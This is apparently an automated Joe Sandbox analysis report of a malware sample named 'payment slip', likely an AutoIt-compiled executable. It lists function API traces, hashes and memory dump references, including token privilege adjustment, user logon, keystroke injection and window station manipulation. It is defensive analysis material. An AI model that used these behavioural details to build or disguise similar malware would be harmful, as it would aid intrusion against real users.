                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction ID: 4ea55c772830af62e29ceacb6bc6d3917b8109e706222c1ad79fc75de2a01364
                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction Fuzzy Hash: 900126722047056BE3318F65DC85A9AFBEAFB89370F25051DE18483280EA30A905C6B4
                                        Function 0005E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction ID: 1782a8536c53d766531505b619d84a6c6440cede04705bc4dedab116fc7f5cd2
                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction Fuzzy Hash: 39F02832510E109AD7353A69DC05BDB379A9F523F7F100716FCA1931D3CB74DA0A86A5
                                        Function 00064C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: e20b186fae7426f337fea71416fabe44fbd4ec59d8a883ab16e5af6a00b39624
                                        • Instruction ID: 26708ee5c6e2203f61225a365d5a523609c0c9fbbf97c60b0b360599b1af7710
                                        • Opcode Fuzzy Hash: e20b186fae7426f337fea71416fabe44fbd4ec59d8a883ab16e5af6a00b39624
                                        • Instruction Fuzzy Hash: A5F0E93160222467DBE15F66DC09F9B37CABF817B1B144121FC1DEA381CA70D80186E0
                                        Function 00063820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: e8ac91139ebc5a29214dcae2b28008761a7707ff040eebd57ee1e4580894b571
                                        • Instruction ID: c7a961da7ba74a8eea4a4480a9a8b452bee9e9df7cb7bf2f24276c1d8ab9ce19
                                        • Opcode Fuzzy Hash: e8ac91139ebc5a29214dcae2b28008761a7707ff040eebd57ee1e4580894b571
                                        • Instruction Fuzzy Hash: E6E0ED31100325AEE6B12AA79C05FDB36CBAB42BB1F090020BC0997882CF20DE0283E0
                                        Function 00034F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034F6D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 62e94f39442683798df9a20dff5a72fa1c534f0d8eabe8ece32b1d4f831254c8
                                        • Instruction ID: 9adcd4b3f8b7ee8ccdd952d217ad36e4a9c336483b3eccf453c3211ffb1345c2
                                        • Opcode Fuzzy Hash: 62e94f39442683798df9a20dff5a72fa1c534f0d8eabe8ece32b1d4f831254c8
                                        • Instruction Fuzzy Hash: E1F0A070105741CFDB358F21D490C16B7E8EF0131971889BEE1DA86611C731A844DF00
                                        Function 00032DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        • Opcode ID: 4163f2e373f984726a274fbaf83e8f2b6cb25b521724e4bf321db737c308d89f
                                        • Instruction ID: f582a338eb0050ae55fc1dab996f65211cc83c5b4fddbce87fb11994a618118f
                                        • Opcode Fuzzy Hash: 4163f2e373f984726a274fbaf83e8f2b6cb25b521724e4bf321db737c308d89f
                                        • Instruction Fuzzy Hash: D0E0CD72A001245BD7119358DC05FDA77DDDFC8790F044071FD0DD7249DA64AD808650
                                        Function 000A2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction ID: 2a4d07aa5f4fc4ef49a81758211372cf0f91585825b9383936dce31a53cf954a
                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction Fuzzy Hash: EEE0DFB020AB004FCF3C5A28A8517F777E89F0A300F00082EF6DF82312E57228458A0D
                                        Function 00032B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00033837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                          • Part of subcall function 0003D730: GetInputState.USER32 ref: 0003D807
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                          • Part of subcall function 000330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0003314E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                        • String ID:
                                        • API String ID: 3667716007-0
                                        • Opcode ID: 09fb253e281ac7c8a76b861301ba2344c1f196ad4fe83bd39c59c0d093faf469
                                        • Instruction ID: 74228affa896e8904d69a360b7c78510c11a557d403032cfed734fd4a9d89c21
                                        • Opcode Fuzzy Hash: 09fb253e281ac7c8a76b861301ba2344c1f196ad4fe83bd39c59c0d093faf469
                                        • Instruction Fuzzy Hash: 7DE0CD3170424417C60ABB74B8929FDF75D9BD1351F40153EF186831B3DF6886454351
                                        Function 0007039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 52a943f5dd3766a914dafb5122da9748fd219d19059f4adf793e752e663a982c
                                        • Instruction ID: 4c96fc605a304f0ca85a1b9a6a37042152215434a045206b9e0219f59f331e3f
                                        • Opcode Fuzzy Hash: 52a943f5dd3766a914dafb5122da9748fd219d19059f4adf793e752e663a982c
                                        • Instruction Fuzzy Hash: F9D06C3204010DBBEF028F85DD06EDA3BAAFB48714F014000FE1856020C736E821AB90
                                        Function 00031CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00031CBC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem
                                        • String ID:
                                        • API String ID: 3098949447-0
                                        • Opcode ID: 059d4c16c6d2c2bee22314bd767327ce0399ad672ebb96c1a8d67a6d62813a74
                                        • Instruction ID: 3242a3fac7d8a8b178428c2f699ea7ad2ea5ecea0125562e59f0f1b837acabc8
                                        • Opcode Fuzzy Hash: 059d4c16c6d2c2bee22314bd767327ce0399ad672ebb96c1a8d67a6d62813a74
                                        • Instruction Fuzzy Hash: 5AC04836280304AAF2148B80AC4AF507764A348B10F048001F689A99E382E628A1AA54
                                        Function 0004FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: 65f49407338b2ccd74a4537c5ee3235da69a5044377b6247d62ddcf88a698c8f
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: B731D2B5A0010ADBC768CF59D5C0A69FBA6FF49300B2486B5E80ACB656D731EDC1CBD4
                                        Function 03B022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 03B022B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: a8b816226aa0a2814d1d27dbcf518835a79a95a1e31b21db6dcbb06dda2a466a
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: 92E0BF7494010E9FDB00EFB8D54969E7FB4EF04301F1005A1FD0592280D63099508A62

                                        Non-executed Functions

                                        Function 000C9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000C961A
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C965B
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 000C969F
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C96C9
                                        • SendMessageW.USER32 ref: 000C96F2
                                        • GetKeyState.USER32(00000011), ref: 000C978B
                                        • GetKeyState.USER32(00000009), ref: 000C9798
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C97AE
                                        • GetKeyState.USER32(00000010), ref: 000C97B8
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C97E9
                                        • SendMessageW.USER32 ref: 000C9810
                                        • SendMessageW.USER32(?,00001030,?,000C7E95), ref: 000C9918
                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000C992E
                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000C9941
                                        • SetCapture.USER32(?), ref: 000C994A
                                        • ClientToScreen.USER32(?,?), ref: 000C99AF
                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000C99BC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C99D6
                                        • ReleaseCapture.USER32 ref: 000C99E1
                                        • GetCursorPos.USER32(?), ref: 000C9A19
                                        • ScreenToClient.USER32(?,?), ref: 000C9A26
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9A80
                                        • SendMessageW.USER32 ref: 000C9AAE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9AEB
                                        • SendMessageW.USER32 ref: 000C9B1A
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000C9B3B
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000C9B4A
                                        • GetCursorPos.USER32(?), ref: 000C9B68
                                        • ScreenToClient.USER32(?,?), ref: 000C9B75
                                        • GetParent.USER32(?), ref: 000C9B93
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9BFA
                                        • SendMessageW.USER32 ref: 000C9C2B
                                        • ClientToScreen.USER32(?,?), ref: 000C9C84
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000C9CB4
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9CDE
                                        • SendMessageW.USER32 ref: 000C9D01
                                        • ClientToScreen.USER32(?,?), ref: 000C9D4E
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000C9D82
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C9E05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                        • String ID: U$@GUI_DRAGID$F
                                        • API String ID: 3429851547-4245882001
                                        • Opcode ID: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                        • Instruction ID: 4ae8538a34313ba13e026138447850de0aabe5afe67c5335bb0757d0073c06b1
                                        • Opcode Fuzzy Hash: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                        • Instruction Fuzzy Hash: BA427834208201AFEB25CF28CD88FAEBBE5FF49314F14061DF699976A1D771A960CB51
                                        Function 000C4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 000C48F3
                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 000C4908
                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 000C4927
                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 000C494B
                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 000C495C
                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 000C497B
                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 000C49AE
                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 000C49D4
                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 000C4A0F
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A56
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A7E
                                        • IsMenu.USER32(?), ref: 000C4A97
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4AF2
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4B20
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C4B94
                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 000C4BE3
                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 000C4C82
                                        • wsprintfW.USER32 ref: 000C4CAE
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4CC9
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4CF1
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C4D13
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4D33
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                        • String ID: U$%d/%02d/%02d
                                        • API String ID: 4054740463-1036027768
                                        • Opcode ID: 0e89df77a3d17cb8857b383f42f26cd1bae690c78583f74629c0efb24159026c
                                        • Instruction ID: d5968f93b2617f8765b1ffe18ab7b52741b25716baf2c848df20d66d2f9030e1
                                        • Opcode Fuzzy Hash: 0e89df77a3d17cb8857b383f42f26cd1bae690c78583f74629c0efb24159026c
                                        • Instruction Fuzzy Hash: E212BC71A00215ABFB259F28CC59FAE7BF8FF45710F10412DF51AEA2A1DBB89941CB50
                                        Function 0004F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0004F998
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0008F474
                                        • IsIconic.USER32(00000000), ref: 0008F47D
                                        • ShowWindow.USER32(00000000,00000009), ref: 0008F48A
                                        • SetForegroundWindow.USER32(00000000), ref: 0008F494
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4AA
                                        • GetCurrentThreadId.KERNEL32 ref: 0008F4B1
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4BD
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4CE
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4D6
                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0008F4DE
                                        • SetForegroundWindow.USER32(00000000), ref: 0008F4E1
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F4F6
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F501
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F50B
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F510
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F519
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F51E
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F528
                                        • keybd_event.USER32(00000012,00000000), ref: 0008F52D
                                        • SetForegroundWindow.USER32(00000000), ref: 0008F530
                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0008F557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                        • Instruction ID: 6b534552e183d3afa7291f7dba52558037ffc53d3998300a6cda102c13a3ece0
                                        • Opcode Fuzzy Hash: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                        • Instruction Fuzzy Hash: F8314171A40218BBFB206BB59C4AFBF7EACEB44B50F10006AFA05E61D1C6B55D41AB60
                                        Function 00091201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                          • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                          • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00091286
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000912A8
                                        • CloseHandle.KERNEL32(?), ref: 000912B9
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000912D1
                                        • GetProcessWindowStation.USER32 ref: 000912EA
                                        • SetProcessWindowStation.USER32(00000000), ref: 000912F4
